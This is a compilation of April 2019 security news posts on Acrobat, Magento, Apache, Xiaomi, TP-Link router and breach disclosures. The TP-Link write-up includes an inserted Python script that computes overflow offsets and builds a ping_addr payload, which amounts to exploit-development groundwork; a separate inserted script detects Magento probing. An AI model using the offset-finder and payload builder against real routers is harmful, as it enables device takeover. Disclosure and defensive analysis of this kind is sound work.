Microsoft and Adobe Patch Tuesday updates are here. Find out more about the most serious bugs and how to patch them.

Vulnerability Spotlight: Adobe Acrobat Reader remote code execution

Aleksandar Nikolic of Cisco Talos discovered these vulnerabilities.

Executive summary

There are two remote code execution vulnerabilities in Adobe Acrobat Reader that could occur if a user were to open a malicious PDF on their machine using the software. Acrobat is the most widely used PDF reader on the market, making the potential target base for these bugs fairly large. The program supports embedded JavaScript code in the PDF to allow for interactive PDF forms, giving the potential attacker the ability to precisely control memory layout and creating an additional attack surface.

In accordance with our coordinated disclosure policy, Cisco Talos worked with Adobe to ensure that these issues are resolved and that an update is available for affected customers.

Vulnerability details

Adobe Acrobat Reader DC text field value remote code execution vulnerability (TALOS-2018-0774/CVE-2019-7125)

Specific JavaScript code embedded in a PDF file can lead to heap corruption when the document is opened in Adobe Acrobat Reader DC 2019.010.20069. With careful memory manipulation, this can lead to arbitrary code execution. To trigger this vulnerability, the victim would need to open the malicious file or access a malicious web page. The vulnerability in this advisory is the same as TALOS-2018-0704 (CVE-2018-19716), disclosed in December 2018, which was not properly patched to cover all cases.

Read the complete vulnerability advisory here for additional information.

Versions tested

Talos tested and confirmed that Adobe Acrobat Reader DC, version 2019.010.20069 is affected by this vulnerability.

Coverage

The following SNORTⓇ rules will detect exploitation attempts. Note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Center or Snort.org.

Snort Rules: 48293, 48294

Adobe April Patch Tuesday Addresses Multiple Critical Vulnerabilities In Various Adobe Products

Adobe’s scheduled updates for April 2019 have now rolled out. Allegedly, this update brings fixes for multiple security vulnerabilities in

Adobe April Patch Tuesday Addresses Multiple Critical Vulnerabilities In Various Adobe Products on Latest Hacking News.

Adobe Releases Security Patches for Flash, Acrobat Reader, Other Products

Good morning readers, it's Patch Tuesday again—the day of the month when Adobe and Microsoft release security patches for their software. Adobe just released its monthly security updates to address a total of 40 security vulnerabilities in several of its products, including Flash Player, Adobe Acrobat and Reader, and Shockwave Player. According to an advisory, Adobe Acrobat and Reader

PoC exploit for Carpe Diem Apache bug released

Charles Fol, the security engineer that unearthed the Carpe Diem Apache HTTP Server bug (CVE-2019-0211), has released an exploit for it. “This is between a POC and a proper exploit. I added tons of comments, it is meant to be educational as well,” he noted, but added that it “might fail for a dozen of reasons.” Still, it might help attackers to create a more stable one and deploy it in attacks, so admins – … More

The post PoC exploit for Carpe Diem Apache bug released appeared first on Help Net Security.

Samsung Galaxy S10’ biometric sensor hackable with copy of owner’s fingerprint

By Waqas

The fingerprint security feature of Samsung Galaxy S10 and S10+ has been hacked using only a 3D printer and printed fingerprint of the owner. The hack can be carried out without the presence of the actual owner since a printed copy of the fingerprints is used. When evaluated by security researchers it was confirmed that […]

This is a post from HackRead.com Read the original post: Samsung Galaxy S10’ biometric sensor hackable with copy of owner’s fingerprint

McAfee Blogs: Malware is Coming: Emilia Clarke Is the Most Dangerous “Game of Thrones” Celebrity

The net is dark and full of terrors, especially for fans of HBO’s coveted show “Game of Thrones.” As followers of the series gear up for the premiere of the eighth and final season on April 14th, fans may have more than just white walkers and the Night King to worry about. According to a McAfee’s study on the Most Dangerous Celebrities, it turns out that the Mother of Dragons herself Emilia Clarke is among those whose search results are most likely to be infected with malware.

In fact, the actress who portrays Daenerys Targaryen in the TV drama came in at #17 of our 2018 Most Dangerous Celebrities study. But how exactly does the heir to the Iron Throne pose a cyberthreat to her loyal subjects? Cybercriminals use the allure of celebrities – such as Clarke – to trick unsuspecting users into visiting malicious websites. These sites can be used to install malware on a victim’s device or steal their personal information or passwords. With the premiere of the new season right around the corner, it’s likely that cybercrooks will take advantage of the hype around the show to lure supporters of the Seven Kingdoms into their trap.

Thankfully, there are plenty of ways fans can keep up with Khaleesi without putting their online safety at risk. Follow these tips to pledge your allegiance to your cybersafety:

  • Refrain from using illegal streaming sites. When it comes to dangerous online behavior, using illegal streaming sites is the equivalent of spreading the Mad King’s wildfire to your device. Many illegal streaming sites are riddled with malware or adware disguised as pirated video files. Do your device a favor and stream the show from a reputable source.
  • Be careful what you click. Don’t bend the knee to hackers who tempt users to click on their malicious sites. Users looking for information on the new season should be careful and trust only reliable sources. The safest option is to wait for the official release instead of visiting a potentially malware-ridden third-party website.
  • Keep your device software updated. Install new system and application updates on your devices as soon as they’re available. These updates often include security fixes that can help protect your laptop or computer from an army of undead software bugs.
  • Protect your online realm with a cybersecurity solution. Send your regards to malicious actors with a comprehensive security solution like McAfee Total Protection. This can help protect you from malware, phishing attacks, and other threats. It also includes McAfee WebAdvisor, which helps alert users of malicious websites.

We wish you good fortune in the browsing to come. To stay updated on all of the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Malware is Coming: Emilia Clarke Is the Most Dangerous “Game of Thrones” Celebrity appeared first on McAfee Blogs.


Buffer Overflow Vulnerability in TP-Link Routers Can Allow Remote Attackers to Take Control

Internet routers are among the most ubiquitous devices that home and business users depend on every day for communications, banking, shopping and commercial transactions. IBM Security researcher Grzegorz Wypych (aka h0rac) took a closer look at one of the most widespread consumer routers in use today, the TP-Link WR940, and found a zero-day buffer overflow vulnerability that could allow malicious third parties to take control of the device from a remote location.

Let's dive into the details of this vulnerability, which IBM Security responsibly disclosed to TP-Link; the patches TP-Link subsequently issued are listed at the end of the article.

Figure 1: TP-Link WR940 (Source: TP-Link)

Authenticate and Control

Looking into commonly used routers, our team of ethical hackers examined some of the models that many consumers use in their homes. The reason behind examining router security is their omnipresent status and the potential for attackers to use them against internet users and businesses alike, while mostly relying on automated attacks.

This is the first part in a series of router vulnerability reports. Here, we’ll focus on the TP-Link WR940 device and touch on the software that runs the router — more specifically, TL-WR940N hardware version 3 and TL-WR941ND hardware version 6, both running firmware version 150312.

In the case of these routers, we found a zero-day buffer overflow vulnerability, one that was not previously reported and that worked for authenticated users, allowing them to take unrestricted remote control of the router.

Looking at the software security of the device, it appears that most of the effort to apply controls was put into the web-based interface that users can access to configure the router. However, controls that were placed on the owner’s interface cannot protect the actual router and could allow an attacker to take advantage of that fact.

For example, in the System Tools/Diagnostic tab of the control panel, users can send Internet Control Message Protocol (ICMP) echo request/response packets via ping, either to an IPv4 address or to a hostname. The panel's client-side controls may limit the characters and length accepted, but nothing stops a user from intercepting the request with a Burp Suite proxy (a graphical tool for testing web application security) and malforming it before it reaches the router.

Bug by Bug

We started by looking for common application vulnerabilities. First we examined command injection, because operations such as ping are often implemented by handing a command line to a shell such as Bash. That was not the case here: static analysis showed no reference to a system call, so we ruled out the injection scenario.

What we did find was another interesting activity: When a user sends ping requests, a message is displayed on the device’s console referring to native code compiled to the firmware’s binary.

Figure 2: Ping requests invoke a message on the router’s console

Next, we looked at outgoing GET requests to the ping service by running a Burp Suite proxy to examine them. In the following image, we can see the request’s parameters. The same parameters also appeared in the console message shown in Figure 2.

Figure 3: GET request to ping service

To zoom into the details, we launched the IDA disassembler and looked at some string references. More specifically, we were looking for the “Here is a new ping” reference.

Figure 4: GET request to ping service on IDA Pro

From here, we jumped directly to the referenced function’s address:

# DATA XREF: sub_44C610+5E0↑o

And here, we can see a notable message block:

Figure 5: Message block shown in IDA Pro

The disassembly is MIPS (Microprocessor without Interlocked Pipeline Stages) assembly. The MIPS architecture, which originated in J. L. Hennessy's project at Stanford in 1981, is widely used in embedded systems such as gateways and routers.

Before we look more closely at this message block, here’s a quick crash course on MIPS central processing units (CPUs):

  • The first four function arguments are passed in registers $a0-$a3; any further arguments are passed on the stack.
  • Register $t9 usually holds the address of the function being called: the code loads the address into $t9 and jumps to it with the jalr instruction.
  • The $s0-$s7 registers are callee-saved: a function that uses them must save and restore them.
  • The return value is placed in $v0 (and $v1 for a second word).

Classic Buffer Overflow

Armed with these basics, we can move to the next step of the analysis. In the following image, printf receives a pointer to the string that appears in the console log we looked at earlier (Figure 2); the pointer is loaded into $a0.

Next, the code calls the ipAddrDispose function, loading the value 564 (decimal) into $a2, which could be a parameter of that function. Let's jump into it and see what's inside.

Figure 6: ipAddrDispose function exposing buffer overflow issue

We won't go through a line-by-line analysis here; this is only a fragment of the entire function. What's interesting is the strcpy call inside the TP-Link httpd binary, the vulnerable process. This is a classic buffer overflow.

strcpy copies its input byte by byte until it finds a terminating NUL, with no check of the destination's size. Input longer than the stack buffer that ipAddrDispose allocates therefore runs past the buffer's boundaries.

We have our bug, but can it truly be exploited? We can find out whether this zero-day is critical by creating a proof-of-concept of an attack scenario.

Status: Exploitable

The first thing to try with a buffer overflow is to see what happens when the data exceeds the available space. We therefore change the ping_addr parameter to hold a run of 0x41 (“A”) bytes longer than the buffer. In the following image, the ipAddrDispose function reserves 224 bytes (hexadecimal 0xE0) for its stack frame.

Figure 7: ipAddrDispose reserves 224 bytes for its stack frame

Since the frame is 224 bytes, we elected to send 300 bytes of A's and see what happens. To do that, we modified the ping_addr parameter in the HTTP request after intercepting it with a Burp Suite instance.

Figure 8: Sending 300 bytes of A’s to limited stack

By the following message on the console, we can see that, indeed, it is possible to override the return address $ra and begin controlling program execution.

Figure 9: Router console message shows that address override is possible

Some Pre-Exploit Recon

Before writing an exploit, it is wise to check what is being overwritten here when the oversized payload is sent through. Let’s take a closer look at the core memory dump, which is typically dumped to the /tmp folder.

What we are looking for is information that will help craft the exploit down the line. More specifically, we want to see what registers we can control if we exploit this bug.

To analyze the core memory dump, we downloaded it to our host and placed it in the folder where the extracted file system is found (the httpd binary).

Figure 10: Analyzing TP-Link router core memory dump

Remember, this is MIPS architecture. The next step here will be to open the core dump using gdb-multiarch, which is a GNU Debugger (GDB) with support for multiple architectures. GDB is a source-level debugger that is capable of breaking programs at any specific line, displaying variable values and determining where errors occurred.

Figure 11: Using gdb-multiarch to open core memory dump

We can now control three registers:

  1. $s0;
  2. $s1; and
  3. $ra.

The $a0 register was only partially under our control, because it merely points to an address on the stack. Keep in mind, too, that exploitation here takes place on MIPS, which differs considerably from exploitation on more familiar desktop architectures. With this information, we started writing working exploit code.
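The recon step above, as an added example that is not IBM's code: sending 300 A's proves the crash, but to write the exploit you need the exact offsets of the bytes that land in $s0, $s1 and $ra. A cyclic (De Bruijn) pattern gives those in one run, because every 4-byte window of the pattern is unique, so a word read from a register in the gdb-multiarch session maps back to exactly one offset. The register values below are constructed from the pattern at offsets 212, 216 and 220, chosen only so the demo checks itself; they are not the real values, which the article does not print. Big-endian byte order is an assumption about the router's MIPS SoC; pass "little" for a mipsel target.

```python
"""Cyclic-pattern offset finder for the ping_addr overflow (added example, not IBM's code)."""
import string
from urllib.parse import quote


def de_bruijn(alphabet, n):
    """Lazily yield a De Bruijn sequence B(k, n): every n-character window occurs once."""
    k = len(alphabet)
    a = [0] * (k * n)

    def db(t, p):
        if t > n:
            if n % p == 0:
                for x in a[1:p + 1]:
                    yield alphabet[x]
        else:
            a[t] = a[t - p]
            yield from db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from db(t + 1, t)

    yield from db(1, 1)


def cyclic_pattern(length, alphabet=string.ascii_lowercase, n=4):
    """First `length` bytes of the sequence; lowercase only, so it survives input filters."""
    out = []
    for ch in de_bruijn(alphabet, n):
        if len(out) == length:
            break
        out.append(ch)
    return "".join(out).encode()


def find_offset(pattern, register_value, endian="big", width=4):
    """Offset in `pattern` of the word that ended up in a register, or -1 if not from it.

    endian="big" assumes a big-endian MIPS core (assumption); use "little" for mipsel.
    """
    needle = register_value.to_bytes(width, endian)
    return pattern.find(needle)


def build_ping_addr_param(pattern):
    """URL-encode the pattern as the ping_addr query parameter seen in the GET request."""
    return "ping_addr=" + quote(pattern)


# --- Constructed demo: the article does not print the real register dump ---
PATTERN = cyclic_pattern(300)

# Words as `info registers` in gdb-multiarch might show them. Derived from hypothetical
# offsets 212/216/220 so that the example is self-checking.
CRASH_REGISTERS = {
    "s0": int.from_bytes(PATTERN[212:216], "big"),
    "s1": int.from_bytes(PATTERN[216:220], "big"),
    "ra": int.from_bytes(PATTERN[220:224], "big"),
}


def register_offsets(registers, pattern=PATTERN, endian="big"):
    """Map each controlled register to the offset in the overflow that fills it."""
    return {name: find_offset(pattern, value, endian) for name, value in registers.items()}


if __name__ == "__main__":
    print(register_offsets(CRASH_REGISTERS))        # {'s0': 212, 's1': 216, 'ra': 220}
    print(build_ping_addr_param(PATTERN)[:48])      # ping_addr=aaaabaaacaaadaaaeaaaf...
```

A register whose word is not found in the pattern (find_offset returns -1) was not overwritten by the copy, which is how $a0 here would show up as only indirectly controlled.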

Routers: A Modern-Day Essential in Dire Need of Better Security

The American Consumer Institute (ACI) looked into router security and found that no less than 83 percent of routers harbor high-risk vulnerabilities, many of which are open-source flaws. This staggering ratio accounts for both home and office routers and includes major name brands sold around the world.

Routers are not just a relay switch; they have their own operating systems, their own software and, inevitably, their own vulnerabilities. Router vulnerabilities are rather common and can be attributed to various factors. It starts with internet service providers (ISPs) issuing the same router to millions of customers and inadvertently allowing vulnerability aggregation when zero-days arise, but it has more to do with the software that runs routers.

Most manufacturers outsource firmware that gets developed with costs in mind. As such, it is rarely elaborate and, judging by the amount of router vulnerabilities out there, also rarely tested or secure. Making matters worse is the patch and update process: When was the last time you got a message prompting you to update your router’s firmware? Likely almost never. This means that even when patches are dealt with and become available to the public, most users will never know of them or know to take action.

We won’t delve into open networking ports and unsecured protocols that run home routers — think Universal Plug and Play (UPnP), Home Network Administration Protocol (HNAP) and the Wi-Fi Protected Setup (WPS) password — but those interested in further reading should look them up.

How much do these vulnerabilities matter? A lot. At the very least, router vulnerabilities can lead to consumer data being compromised and used by attackers. The same issue can allow criminal/nation-state third parties to spy on users, send them to phishing and malware-hosting websites, or alter data the user sends out when browsing the internet. Routers can also be infected by malware and enslaved by a malicious internet of things (IoT) botnet such as VPNFilter, which can eavesdrop on traffic passing through the router, or the Mirai botnet, which disrupted internet connections as well as telephony and television services in Germany for days before it was possible to stop the mayhem.

Vulnerabilities on routers used by businesses can have similar impacts at scale and likely touch on even more valuable information that could interest cybercriminals and nation-state threat actors alike.

Secure Development, Testing and Better Controls

Limiting the vulnerability of any software to attacks is a task that calls for security in the early stages of the development cycle. The sooner security professionals are introduced to the project, the better the chances are that the end result will be more secure; as a bonus, it is also likely to be much less costly. If that is not a possibility, not all is lost: Scanning code after it is written can also help fix issues and make it more resilient to attacks.

Another way to find and fix issues after devices have been released to the marketplace is by testing them. Penetration testing should look at both code-related security gaps and hardware-related exploitation possibilities. When these are found, they should be prioritized for remediation and addressed promptly to secure the user base from potential attacks.

Router vendors can better enable users with additional security controls: longer password standards, two-factor authentication (2FA) options, more warning prompts when remote access can be attained by unauthorized parties, and the ability to separate modem and router functions, to name a few. Routers are an essential part of almost every home’s communication consumption, and security has become equally essential to keep those homes and their residents’ data and privacy safe.

TP-Link Patches for Users of These Models

After disclosure, TP-Link’s security team released a patch and indicated that both devices in these hardware versions are no longer being manufactured (product end of life).

The new firmware has been published on the website for both devices in their affected hardware revisions (firmware is labeled 190218).

Support/Download Page Links

The post Buffer Overflow Vulnerability in TP-Link Routers Can Allow Remote Attackers to Take Control appeared first on Security Intelligence.

Magento sites under attack through easily exploitable SQLi flaw

A recently patched SQL injection flaw affecting the popular open-source e-commerce platform Magento is being actively exploited by attackers, so if you haven’t implemented the provided security update or patch, now is the time to do it. Magento devs, if you haven't patched already, do it ASAP. We've already seen attempts at two of our shops using the published POC. We're safe because we already patched every shop on Wednesday. https://t.co/5nZjMGBEUu — Peter Jaap Blaakmeer … More

The post Magento sites under attack through easily exploitable SQLi flaw appeared first on Help Net Security.

The unique business-critical threats facing converged IT-OT systems

Manufacturing networks still running outdated technology could risk their intellectual property and production processes. The Trend Micro report, Securing Smart Factories: Threats to Manufacturing Environments in the Era of Industry 4.0, outlines the security dimension of a new era for manufacturing driven by IoT and connectivity everywhere. Manufacturers are heavily investing in the convergence of traditional operational technology (OT) with IT networks in 2019, adding new technology to environments that are still vulnerable to more … More

The post The unique business-critical threats facing converged IT-OT systems appeared first on Help Net Security.

Pocsuite3 – An Open-Sourced Remote Vulnerability Testing Framework

pocsuite3 is an open-source remote vulnerability testing and proof-of-concept development framework developed by the Knownsec 404 Team. It comes with a powerful proof-of-concept engine and many features for penetration testers and security researchers.

Features
  • PoC scripts can run in attack, verify or shell mode
  • Plugin ecosystem
  • Dynamic loading of PoC scripts from anywhere (local file, Redis, database, Seebug ...)
  • Loading of multiple targets from anywhere (CIDR, local file, Redis, database, ZoomEye, Shodan ...)
  • Results can be easily exported
  • Dynamic patching and hooking of requests
  • Usable both as a command-line tool and as an importable Python package
  • IPv6 support
  • Global HTTP/HTTPS/SOCKS proxy support
  • Simple spider API for PoC scripts to use
  • Integration with Seebug (load PoCs from the Seebug website)
  • Integration with ZoomEye (load targets from a ZoomEye dork)
  • Integration with Shodan (load targets from a Shodan dork)
  • Integration with Ceye (verify blind DNS and HTTP requests)
  • Friendly debugging of PoC scripts in IDEs
  • More ...

Screenshots (images not reproduced here)
  • pocsuite3 console mode
  • pocsuite3 shell mode
  • pocsuite3 load PoC from Seebug
  • pocsuite3 load multi-target from ZoomEye
  • pocsuite3 load multi-target from Shodan

Requirements
  • Python 3.4+
  • Works on Linux, Windows, Mac OSX, BSD

Installation
The quick way:
$ pip install pocsuite3
Or download the latest source zip package and extract it:
$ wget https://github.com/knownsec/pocsuite3/archive/master.zip
$ unzip master.zip
The latest version of this software is available from: http://pocsuite.org

Documentation
Documentation is available in the docs directory, in English and Chinese.


150 million Xiaomi smartphones have a pre-installed app that puts them at security risk

Security researcher finds pre-installed apps on 150 million Xiaomi phones vulnerable to attacks

Check Point researcher Slava Makkaveev discovered a vulnerability in ‘Guard Provider’, Xiaomi’s pre-installed, non-removable security app, which ironically is meant to protect the phone from malware.

“This vulnerability discovered in Xiaomi’s ‘Guard Provider,’ however, raises the worrying question of who is guarding the guardian. And although the guardian should not necessarily need guarding, clearly when it comes to how apps are developed, even those built in by the smartphone vendor, one cannot be too careful,” Makkaveev said in his blog post.

Guard Provider lets users choose between three built-in antivirus scanners (Avast, AVL and Tencent) to detect potential malware. The app receives its updates over an unsecured, unencrypted HTTP connection.

“Briefly put, due to the unsecured nature of the network traffic to and from Guard Provider, a threat actor could connect to the same Wi-Fi network as the victim and carry out a Man-in-the-Middle (MiTM) attack. Then, as part of a third-party SDK update, he could disable malware protections and inject any rogue code he chooses such to steal data, implant ransomware or tracking or install any other kind of malware.”

The vulnerability is attributed to “SDK Fatigue”: the increasing use of multiple SDKs within the same app makes the app more susceptible to problems such as “crashes, viruses, malware, privacy breaches, battery drain, slowdown, and many other problems.”

Further, the use of several SDKs within the same app could create unpreventable issues for the developers such as:

  1. A problem in one SDK would compromise the protection of all the others.
  2. The private storage data of one SDK cannot be isolated and can, therefore, be accessed by another SDK.

By using too many SDKs within the same app, developers leave “organizations and users exposed to potential pitfalls that can be exploited by threat actors to interfere with the regular operation of the device,” Makkaveev concluded.

Following a disclosure report from Check Point Research, Xiaomi promptly patched the flaw that exposed users to MiTM attacks.

A Xiaomi spokeswoman said in a statement, “Xiaomi is aware of this and [has] already worked with our partner Avast to fix it.”

For more information about the vulnerability, you can read the Check Point blog.

The post 150 million Xiaomi smartphones have a pre-installed app that puts them at security risk appeared first on TechWorm.

New malware can modify CT and MRI scan results

By Waqas

Call it killer malware? Israeli researchers have developed a new malware that highlights some very critical and dangerous security vulnerabilities in medical imaging equipment, which is commonly used to diagnose serious health conditions like cancer and hypertrophic cardiomyopathy (HCM). Not only can the malware impact the diagnosis of the imaging equipment but can also compromise […]

This is a post from HackRead.com Read the original post: New malware can modify CT and MRI scan results

Hackers Could Turn Pre-Installed Antivirus App on Xiaomi Phones Into Malware

What could be worse than this, if the software that's meant to protect your devices leave backdoors open for hackers or turn into malware? Researchers today revealed that a security app that comes pre-installed on more than 150 million devices manufactured by Xiaomi, China's biggest and world's 4th largest smartphone company, was suffering from multiple issues that could have allowed remote

Vulnerability found in Guard Provider, Xiaomi’s pre-installed security app

Check Point Research discovered a vulnerability in one of the preinstalled apps on devices manufactured by one of the world’s biggest mobile vendors, Xiaomi. The vulnerability would have allowed an attacker to carry out a Man-in-the-Middle (MiTM) attack and inject any rogue code he chooses such as password stealing, ransomware, tracking or any other kind of malware onto the device. The vulnerability is in the pre-installed security app, Guard Provider, which should protect the phone … More

The post Vulnerability found in Guard Provider, Xiaomi’s pre-installed security app appeared first on Help Net Security.

[SANS ISC] New Waves of Scans Detected by an Old Rule

I published the following diary on isc.sans.edu: “New Waves of Scans Detected by an Old Rule“:

Who remembers the famous ShellShock (CVE-2014-6271)? This bug affected the bash shell in 2014 and was critical due to the fact that it was easy to exploit and that bash is a widespread shell used in many tools/applications. So, at this time, I created an OSSEC alert to report ShellShock exploitation attempts against my servers. Still today, I’m getting a hit on this rule from time to time… [Read more]

[The post [SANS ISC] New Waves of Scans Detected by an Old Rule has been first published on /dev/random]

Smashing Security #122: The big fat con at Office Depot

Office Depot and OfficeMax are fined millions for tricking customers into thinking their computers were infected with malware, car alarms can make your vehicle less secure, and facial recognition in apartment blocks comes under the microscope.

All this and much more is discussed in the latest edition of the award-winning “Smashing Security” podcast by computer security veterans Graham Cluley and Carole Theriault, joined this week by The Cyberwire’s Dave Bittner.

Cybercriminals Feast on Earl Enterprises Customer Data Exposed in Data Breach

Most people don’t think about their credit card information being stolen and sold over the dark web while they’re enjoying a night out at an Italian restaurant. However, many people are experiencing this harsh reality. Earl Enterprises, the parent company of Buca di Beppo, Planet Hollywood, Earl of Sandwich, and Mixology 101 in LA, confirmed that the company was involved in a massive data breach, which exposed the credit card information of 2.15 million customers.

The original discovery was made by cybersecurity researcher Brian Krebs, who found the underground hacking forum where the credit card information had been posted for sale. He determined that the data first surfaced on Joker’s Stash, an underground shop that sells large batches of freshly-stolen credit and debit cards on a regular basis. In late February, Joker’s Stash moved a batch of 2.15 million stolen cards onto their system. This breach involved malware remotely installed on the company’s point-of-sale systems, which allowed cybercrooks to steal card details from customers between May 23, 2018, and March 18, 2019. This malicious software was able to capture payment card details including card numbers, expiration dates, and, in some cases, cardholder names. With this information, thieves are able to clone cards and use them as counterfeits to purchase expensive merchandise such as high-value electronics.

It appears that all 67 Buca di Beppo locations in the U.S., a handful of the 31 Earl of Sandwich locations, and the Planet Hollywood locations in Las Vegas, New York, and Orlando were impacted during this breach. Additionally, Tequila Taqueria in Las Vegas, Chicken Guy! in Disney Springs, and Mixology 101 in Los Angeles were also affected by this breach. Earl Enterprises states that online orders were not affected.

While large company data breaches such as this are difficult to avoid, there are a few steps users can take to better protect their personal data from malicious thieves. Check out the following tips:

  • Keep an eye on your bank account. One of the simplest ways to determine whether someone is fraudulently using your credit card information is to monitor your bank statements. If you see any charges that you did not make, report it to the authorities immediately.
  • Check to see if you’ve been affected. If you know you’ve made purchases at an Earl Enterprises establishment in the last ten months, use this tool to check if you could have been potentially affected.
  • Place a fraud alert. If you suspect that your data might have been compromised, place a fraud alert on your credit. This not only ensures that any new or recent requests undergo scrutiny, but also allows you to have extra copies of your credit report so you can check for suspicious activity.
  • Freeze your credit. Freezing your credit will make it impossible for criminals to take out loans or open up new accounts in your name. To do this effectively, you will need to freeze your credit at each of the three major credit-reporting agencies (Equifax, TransUnion, and Experian).
  • Consider using identity theft protection. A solution like McAfee Identity Theft Protection will help you to monitor your accounts and alert you of any suspicious activity.

And, of course, to stay updated on all of the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Cybercriminals Feast on Earl Enterprises Customer Data Exposed in Data Breach appeared first on McAfee Blogs.

Users Complain Of A Skype App Bug That Answers Calls Automatically

Earlier this year, Skype’s Android app made it to the news due to an authentication bypass vulnerability. Once again, a

Users Complain Of A Skype App Bug That Answers Calls Automatically on Latest Hacking News.

Magento Flaw Lets Cybercriminals Access E-Commerce Sites Without Authentication

Security researchers discovered a Magento flaw that could allow threat actors to penetrate and control features within the popular e-commerce site without authentication.

The Adobe-owned company rushed to offer a patch after a blog post on Sucuri late last week outlined details of an injection vulnerability dubbed PRODSECBUG-2198. Cybercriminals would have to download and crack the necessary password hashes to exploit the vulnerability, but once they do, it would be relatively simple to skim credit card numbers or install backdoors.

In fact, the Magento flaw was given a rating of 8.8, or “very easy” in terms of how readily it could be used to target e-commerce sites.

Reverse Engineering the Magento Flaw

To prove the severity of the threat, researchers said they were able to reverse engineer the official patch and create a working proof of concept of how it might be used by attackers. The vulnerability threatens e-commerce sites that use both the commercial edition of Magento and the open-source version and may go back to some of the product’s earliest releases.

So far, attacks in the wild have not been reported. However, researchers said cybercriminals could use the Magento flaw to inject SQL commands to steal admin rights, usernames and passwords, and other sensitive information. Worse, such attacks could be automated to target a wider pool of vulnerable e-commerce sites simultaneously — a serious concern given that Magento has an estimated 300,000 customers.

The patch subsequently released by Magento covers several other bugs. In the meantime, the researchers recommended monitoring for multiple hits to paths such as /catalog/product/frontend_action_synchronize, which might indicate threat actors are trying to exploit the vulnerability.
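The log-monitoring advice above, as an added example that is not code from the Security Intelligence post or from Magento: it parses constructed Apache-style access-log lines and flags client IPs that hit /catalog/product/frontend_action_synchronize more than an assumed threshold of times within a sliding window.

```python
"""Flag repeated hits on the Magento probe path named in the article.

Added example, not code from the Security Intelligence post or from Magento.
It reads Apache/nginx "combined" access-log lines, keeps only requests for
/catalog/product/frontend_action_synchronize, and reports client IPs that hit
that path more than THRESHOLD times inside any WINDOW_SECONDS-long span.
Legitimate storefront JavaScript also calls this path, so the threshold is an
assumption to tune against your own baseline. The log lines are constructed.
"""
import re
from collections import defaultdict
from datetime import datetime

WATCHED_PATH = "/catalog/product/frontend_action_synchronize"
THRESHOLD = 3            # assumed: more hits than this per window is worth a look
WINDOW_SECONDS = 300     # assumed: 5-minute sliding window

# Combined log format: ip ident user [time] "METHOD path PROTO" status size "ref" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Constructed sample lines (documentation IP ranges); one line is deliberately malformed.
SAMPLE_LOG = """\
203.0.113.7 - - [02/Apr/2019:10:00:01 +0000] "POST /catalog/product/frontend_action_synchronize HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [02/Apr/2019:10:00:02 +0000] "POST /catalog/product/frontend_action_synchronize HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [02/Apr/2019:10:00:03 +0000] "POST /catalog/product/frontend_action_synchronize HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [02/Apr/2019:10:00:04 +0000] "POST /catalog/product/frontend_action_synchronize HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.20 - - [02/Apr/2019:10:01:00 +0000] "GET /catalog/product/view/id/42 HTTP/1.1" 200 8192 "-" "Mozilla/5.0"
198.51.100.20 - - [02/Apr/2019:10:01:05 +0000] "POST /catalog/product/frontend_action_synchronize HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.20 - - [02/Apr/2019:11:30:00 +0000] "POST /catalog/product/frontend_action_synchronize HTTP/1.1" 200 512 "-" "Mozilla/5.0"
garbage line that does not parse
"""


def parse_line(line):
    """Return (ip, timestamp, method, path, status) or None if the line does not match."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
    path = m.group("path").split("?", 1)[0]          # drop any query string
    return m.group("ip"), ts, m.group("method"), path, int(m.group("status"))


def find_probing_ips(lines, threshold=THRESHOLD, window_seconds=WINDOW_SECONDS):
    """Map each suspicious client IP to the largest number of WATCHED_PATH hits it made
    inside any window_seconds-long span; IPs never exceeding `threshold` are omitted."""
    hits = defaultdict(list)
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue                                  # skip unparsable lines
        ip, ts, _method, path, _status = parsed
        if path == WATCHED_PATH:
            hits[ip].append(ts)

    flagged = {}
    for ip, stamps in hits.items():
        stamps.sort()
        start = 0
        for end, ts in enumerate(stamps):
            # advance the window's left edge until it spans at most window_seconds
            while (ts - stamps[start]).total_seconds() > window_seconds:
                start += 1
            count = end - start + 1
            if count > threshold:
                flagged[ip] = max(flagged.get(ip, 0), count)
    return flagged


if __name__ == "__main__":
    for ip, count in find_probing_ips(SAMPLE_LOG.splitlines()).items():
        print(f"{ip}: {count} hits on {WATCHED_PATH} within {WINDOW_SECONDS}s")
```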

Assess Your Patch Management Posture

Effective patch management is critical to defend against threats exploiting the Magento vulnerability. Patch posture reporting can help security teams determine the severity of the threat, when a patch was released, whether other patches have since superseded it and even which machines might be offline for repair. This enables the organization to measure the effectiveness of both its patch management processes and the patches themselves in remediating threats.

The post Magento Flaw Lets Cybercriminals Access E-Commerce Sites Without Authentication appeared first on Security Intelligence.

Patched Apache flaw is a serious threat for web hosting providers

Organizations running Apache web servers are urged to implement the latest security update to fix a serious privilege escalation flaw (CVE-2019-0211) that can be triggered via scripts and could allow unprivileged web host users to execute code with root privileges, i.e. allow them to gain complete control of the machine. About CVE-2019-0211: Discovered by security researcher Charles Fol and dubbed Carpe Diem, the vulnerability affects only Apache HTTP Server on Unix systems. “In Apache HTTP … More

The post Patched Apache flaw is a serious threat for web hosting providers appeared first on Help Net Security.

Georgia Tech data breach: 1.3M students and staff potentially affected

The Georgia Institute of Technology, commonly referred to as Georgia Tech, has suffered yet another data breach. This time, the number of affected individuals may have reached 1.3 million. What is known about the breach? “Application developers for the Institute noticed a significant performance impact in one of its web applications and began an investigation on March 21, 2019. During this investigation it was determined the performance issue was the result of a security incident,” … More

The post Georgia Tech data breach: 1.3M students and staff potentially affected appeared first on Help Net Security.

